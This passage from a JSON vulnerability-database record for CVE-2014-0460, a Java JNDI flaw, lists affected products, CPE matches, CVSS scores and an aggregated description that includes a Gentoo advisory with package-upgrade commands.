"jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jrockit r28.2.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "cosminexus developer standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "cosminexus application server standard 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "java se embedded 7u51", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "cosminexus developer professional 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "espace ivs v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cosminexus developer professional 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "system networking switch center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.11" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "runtimes for java technology sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud provisioning fp3 if0001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.21" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.141" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus client 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.13" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "cosminexus client 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "cosminexus studio 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.178" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.145" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "runtimes for java technology sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus studio 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus application server standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "cosminexus application server standard 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "cosminexus application server standard 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "cosminexus application server enterprise 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-20" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ts7720 virtualization engine 3957-vea", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "system networking switch center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.111" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus application server enterprise 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere business events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "smartcloud provisioning fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "vcenter update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" } ], "sources": [ { "db": "BID", "id": "66916" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.8.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "15.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0460" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" } ], "trust": 0.5 }, "cve": "CVE-2014-0460", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-67953", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0460", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201404-275", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-67953", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via vectors related to JNDI. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027JNDI\u0027 sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. (CVE-2014-1876)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201502-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: February 15, 2015\n Bugs: #507798, #508716, #517220, #525464\n ID: 201502-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Oracle\u0027s Java SE\nDevelopment Kit and Runtime Environment, the worst of which could lead\nto execution of arbitrary code. Please review the CVE\nidentifiers referenced below for details. \n\nImpact\n======\n\nA context-dependent attacker may be able to execute arbitrary code,\ndisclose, update, insert, or delete certain data. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.7.0.71\"\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.7.0.71\"\n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge -a -1 -v \"\u003e=app-emulation/emul-linux-x86-java-1.7.0.71\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 2 ] CVE-2014-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432\n[ 3 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 4 ] CVE-2014-0448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448\n[ 5 ] CVE-2014-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449\n[ 6 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 7 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 8 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 9 ] CVE-2014-0454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454\n[ 10 ] CVE-2014-0455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455\n[ 11 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 12 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 13 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 14 ] CVE-2014-0459\n 